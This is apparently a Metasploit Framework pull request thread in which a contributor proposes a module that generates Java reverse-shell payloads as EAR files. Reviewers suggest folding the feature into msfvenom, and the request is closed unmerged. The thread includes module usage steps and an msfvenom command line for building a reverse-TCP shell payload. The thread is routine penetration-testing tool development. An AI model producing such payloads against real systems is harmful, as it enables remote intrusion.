Created the ear_generator module to automatically generate EAR shells
rapid7/metasploit-framework pull request #9241
Opened 2017-11-24 21:30 UTC by abdoudhassi

This module generates a java payload in the format of an EAR file.

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/misc/ear_generator`
- [ ] `run`

It should generate a file named shell.ear under Metasploit's local directory. Unless you change the FILENAME option.

2017-11-25 00:32 UTC, wvu-r7 commented
👂

2017-11-25 00:35 UTC, wvu-r7 commented
I think this should be added to `Msf::Util::EXE` first. WAR creation lies there.

2017-11-26 18:32 UTC, sempervictus commented
Code looks sane, though belongs in exe.rb (as wvu said). Thanks for the addition

2017-11-27 08:46 UTC, timwr requested changes
@abdoudhassi excellent work. However I think this belongs as part of msfvenom. Look at how the `war` file generation is done: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/util/exe.rb#L1511
You should be able to do something like:
`msfvenom -p java/(jsp??)_shell_reverse_tcp LHOST=ip LPORT=4444 -f ear > shell.ear`

2018-07-13 11:16 UTC, jrobles-r7 commented
It is required that code in your fork be merged **from a unique branch** in your repository to master in Rapid7's.  Please create a new branch in your fork of framework and resubmit this from that branch.

```
git checkout -b <BRANCH_NAME>
git push <your_fork_remote> <BRANCH_NAME>
```

This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.

Closing based on the this requirement, please do resubmit from a unique branch.

2018-07-13 11:16 UTC, closed without merging